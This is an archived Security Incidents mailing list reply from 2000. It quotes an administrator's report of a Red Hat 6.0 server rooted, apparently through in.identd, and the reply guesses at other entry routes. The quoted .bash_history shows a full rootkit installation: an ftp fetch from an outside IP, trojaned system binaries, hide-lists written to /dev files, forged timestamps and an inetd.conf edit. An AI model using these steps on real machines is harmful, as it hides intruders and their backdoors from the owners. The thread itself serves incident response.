Security Incidents mailing list archives
Re: Rooted through in.identd on Red Hat 6.0
From: sec () ORGONE NEGATION NET (jms)
Date: Thu, 20 Apr 2000 00:31:46 -0700
what other services were running? im more inclined to think they gained entry through other means, trojaned the box, then came in again to clean up the logs and forgot to nuke the .bash_history. the in.identd entries are explained by his ftp session, which was probably to get the rootkit: ftp 200.192.58.201 21 <-- from .bash_history ^^^^^^^^^^^^^^ Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201 ^^^^^^^^^^^^^^ ..from syslogs. supply a list of daemons running at the time of the breakin, i suspect we will see something known to be rootable. -jason storm jms () negation net /* hard work never killed noboby, but i aint takin no chances. */
Hi, A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box. RH don't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently. The hacker left the usual trace in /.bash_history, which ran like: mkdir /usr/lib/... ; cd /usr/lib/... ftp 200.192.58.201 21 cd /usr/lib/... mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz gzip -d * chmod +x * mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07 echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ; echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221; touch -t 199910122110 /dev/cui220 touch -t 199910122110 /dev/cui221 touch -t 199910122110 /usr/lib/pt07 touch -t 199910122110 /usr/sbin/syslogd touch -t 199910122110 /usr/sbin/tcpd touch -t 199910122110 /bin/ps touch -t 199910122110 /bin/netstat touch -t 199910122110 /usr/bin/pstree cat /etc/inetd.conf | grep -v 15678 >> /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd ... installing a back door and a partial cover of tracks. The only messages in /var/log/messages around the time were: Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201 Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201 Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 ... the IP address traces back to somewhere in Brazil. Anyone know of any current bug notices, exploits, or patches for in.identd? Del
Current thread:
- Re: Rooted through in.identd on Red Hat 6.0 jms (Apr 20)
- <Possible follow-ups>
- Re: Rooted through in.identd on Red Hat 6.0 Jon Burdge (Apr 20)